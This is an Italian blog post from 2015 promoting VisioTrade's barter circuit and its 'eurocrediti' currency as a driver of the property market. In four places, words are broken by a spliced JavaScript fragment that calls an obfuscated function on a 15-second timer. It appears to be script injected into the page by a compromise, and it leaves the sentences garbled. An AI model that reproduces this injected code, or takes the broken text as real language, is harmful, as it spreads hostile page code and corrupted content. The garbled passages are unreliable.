Da non perdere!

Il mercato immobiliare corre in EuroCrediti

Pubblicato il 25 maggio 2015
Condividi

Le evoluzioni immobiliari in VisioTradeIl mercato immobiliare, in Italia, viaggia a due velocità: praticamente zero per quel che riguarda il denaro a corso legale. A ben più alto regime in VisioTrade, il mercato privato e parallelo in cui ciascuno compra ciò che gli occorre remunerandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andolo semplicemente con ciò che produce.

La compravendita di immobili, ma anche la locazione in eurocrediti, questo il nome della prima moneta complementare italiana B2B, nata nell’estate del 2013 con la stipula del primo rogito in Italia di tal fatta a opera del notaio torinese Remo Bassetti, si sta qualificandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando e rivelandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando sempre più come strumento di stimolo per le microeconomie locali legate a ristrutturazioni di piccoli immobili, anche a uso investimento, capannoni industriali, esercizi commerciali all’interno dei quali impiantare nuove attività. Ma anche garages, case vacanze, persino castelli e dimore di alto pregio.

Il segreto sta nella filiera, e nella voglia degli imprenditori aderenti al circuito di trasformare i capitali fermi e immobilizzati in nuove opportunità di business, benessere e ricchezza, superandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando l’ostacolo della mancanza di liquidità. L’economia di produzione targata VisioTrade non conosce confini. Avanza. Come la creatività professionale e tutto il potenziale economico inespresso che, grazie al metodo virtuoso del corporate barter, può dare ripresa e fiato alle aziende che l’hanno scelto per crescere in modo sano e sicuro, al di là di ogni rischio di insoluto. Al contrario delle banche.

Un commento

  1. Pingback: VisioTrade fa ripartire il mercato immobiliare - VisioBlog

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *